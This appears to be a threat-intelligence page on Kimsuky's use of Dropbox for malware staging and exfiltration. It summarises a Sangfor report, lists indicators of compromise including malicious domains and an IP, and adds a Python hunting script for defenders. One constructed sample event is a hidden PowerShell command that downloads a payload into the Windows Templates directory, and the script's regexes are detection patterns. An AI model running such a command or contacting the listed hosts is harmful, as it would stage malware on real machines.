Analysis of Kimsuky's Use of Dropbox Cloud Storage in Its Operations
2024-01-30 • Sangfor • Analysis of Kimsuky operations leveraging Dropbox cloud storage
Sangfor links this Kimsuky activity to malicious LNK files disguised as Korean PDF or HWP documents for targets in cryptocurrency, government, diplomacy, media, and North Korea policy circles. One lure posed as a Korean cryptocurrency trading lecture and used PowerShell to pull ps.bin from Dropbox, which then loaded r_enc.bin and a TutClient remote-control component. The chain wrote a VBS stage under the Windows Templates directory, fetched a decoy PDF from hyojadong.kr, created scheduled tasks, and downloaded later PowerShell payloads. The operation used Dropbox for both staging and exfiltration, including scripts that collected host and file information and uploaded the results through Dropbox APIs.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 0040f03faf5bbdc555f2039a4e33a82b | 2024-01-30 | 2024-06-12 |
| HASH | 3e3013fe03f7416b8d1e96591f8e5839 | 2024-01-30 | 2024-04-17 |
| HASH | fcdcc6c56ae43f7a78413cc5204e9314 | 2024-01-30 | 2024-04-17 |
| HASH | 32519b46b55792084240f850e0c94298 | 2024-01-30 | 2024-04-17 |
| DOMAIN | gbionet.com | 2024-01-30 | 2024-04-17 |
| IPv4 | 122.155.191.33 | 2024-01-30 | 2024-04-17 |
| HASH | dce864eabfbd6445682a4671a2fee1a9 | 2023-12-29 | 2024-04-17 |
| HASH | befa4094eb7ceb31be76ec98b11353b… | 2024-01-30 | 2024-03-28 |
| URL | https://hyojadong.kr/js/slick/d… | 2024-01-30 | 2024-03-28 |
| DOMAIN | hyojadong.kr | 2024-01-30 | 2024-03-28 |
| HASH | 617a4a83e7fb10a4a9ef993cdfe4d83… | 2024-01-30 | 2024-01-30 |
| URL | http://gbionet.com/ | 2024-01-30 | 2024-01-30 |
| HASH | 9fa12b629ca431ebc3aa56da2d7a784a | 2023-09-26 | 2024-01-30 |
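The following is an added hunting example, not code from Sangfor or from the report. It loads the indicator table above into a small matcher and runs it over a handful of constructed endpoint events: hashes are compared exactly, domains also match their subdomains, and the values the table truncates with "…" are treated as prefixes rather than exact strings. A second, heuristic rule flags the behaviour described in the summary (PowerShell reaching for Dropbox while writing under the Windows Templates directory or registering a scheduled task); the `dropbox` and `Templates` patterns in that rule, the event field names, and every sample event are assumptions made for the example.

```python
"""Match constructed endpoint telemetry against the IoC table on this page (added example)."""
import re

# Indicator rows copied from the table above. A trailing "…" marks a value the
# page truncates; such values are matched as prefixes, never completed.
IOC_ROWS = [
    ("HASH", "0040f03faf5bbdc555f2039a4e33a82b"),
    ("HASH", "3e3013fe03f7416b8d1e96591f8e5839"),
    ("HASH", "fcdcc6c56ae43f7a78413cc5204e9314"),
    ("HASH", "32519b46b55792084240f850e0c94298"),
    ("DOMAIN", "gbionet.com"),
    ("IPv4", "122.155.191.33"),
    ("HASH", "dce864eabfbd6445682a4671a2fee1a9"),
    ("HASH", "befa4094eb7ceb31be76ec98b11353b…"),
    ("URL", "https://hyojadong.kr/js/slick/d…"),
    ("DOMAIN", "hyojadong.kr"),
    ("HASH", "617a4a83e7fb10a4a9ef993cdfe4d83…"),
    ("URL", "http://gbionet.com/"),
    ("HASH", "9fa12b629ca431ebc3aa56da2d7a784a"),
]


def build_index(rows):
    """Group indicators by type into (exact values, truncated prefixes)."""
    idx = {}
    for ioc_type, value in rows:
        exact, prefixes = idx.setdefault(ioc_type, (set(), []))
        if value.endswith("…"):
            prefixes.append(value[:-1].lower())
        else:
            exact.add(value.lower())
    return idx


def match_value(idx, ioc_type, observed):
    """Return the indicator that the observed value matches, or None."""
    exact, prefixes = idx.get(ioc_type, (set(), []))
    observed = observed.lower()
    if observed in exact:
        return observed
    if ioc_type == "DOMAIN":
        # A subdomain of a listed domain counts as a hit.
        for domain in exact:
            if observed.endswith("." + domain):
                return domain
    for prefix in prefixes:
        if observed.startswith(prefix):
            return prefix + "…"
    return None


# Heuristic rule for the chain described above (assumed patterns, not page IoCs):
# PowerShell referencing Dropbox together with a write under the Templates
# directory or a scheduled-task registration.
BEHAVIOR_RE = re.compile(r"powershell.*dropbox", re.IGNORECASE)
STAGE_RE = re.compile(r"\\templates\\|schtasks", re.IGNORECASE)

# Assumed event field -> indicator type mapping.
FIELD_TYPES = (("md5", "HASH"), ("dst_ip", "IPv4"), ("dns_query", "DOMAIN"), ("url", "URL"))


def check_event(idx, event):
    """Return a list of (reason, indicator) hits for one event dict."""
    hits = []
    for field, ioc_type in FIELD_TYPES:
        if field in event:
            matched = match_value(idx, ioc_type, event[field])
            if matched:
                hits.append((f"ioc:{ioc_type}", matched))
    cmdline = event.get("cmdline", "")
    if BEHAVIOR_RE.search(cmdline) and STAGE_RE.search(cmdline):
        hits.append(("behaviour:powershell-dropbox-staging", cmdline.split()[0]))
    return hits


def hunt(events, rows=IOC_ROWS):
    """Return [(event index, hits)] for every event that produced at least one hit."""
    idx = build_index(rows)
    results = []
    for i, event in enumerate(events):
        hits = check_event(idx, event)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry for the example; none of it comes from the report.
SAMPLE_EVENTS = [
    {"host": "ws01", "dns_query": "www.hyojadong.kr"},
    {"host": "ws01", "url": "https://hyojadong.kr/js/slick/dXXXX.pdf"},  # constructed filler after the page's prefix
    {"host": "ws02", "md5": "0040F03FAF5BBDC555F2039A4E33A82B"},
    {"host": "ws02", "cmdline": "powershell.exe -w hidden -c \"iwr <dropbox-share-url> -OutFile "
                                "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ps.bin\""},
    {"host": "ws03", "dns_query": "example.com"},
]

if __name__ == "__main__":
    for index, hits in hunt(SAMPLE_EVENTS):
        print(SAMPLE_EVENTS[index]["host"], hits)
```

Prefix matching against the truncated rows will over-match compared with the full indicators, so treat those hits as leads to confirm against the complete values from the original report rather than as definitive.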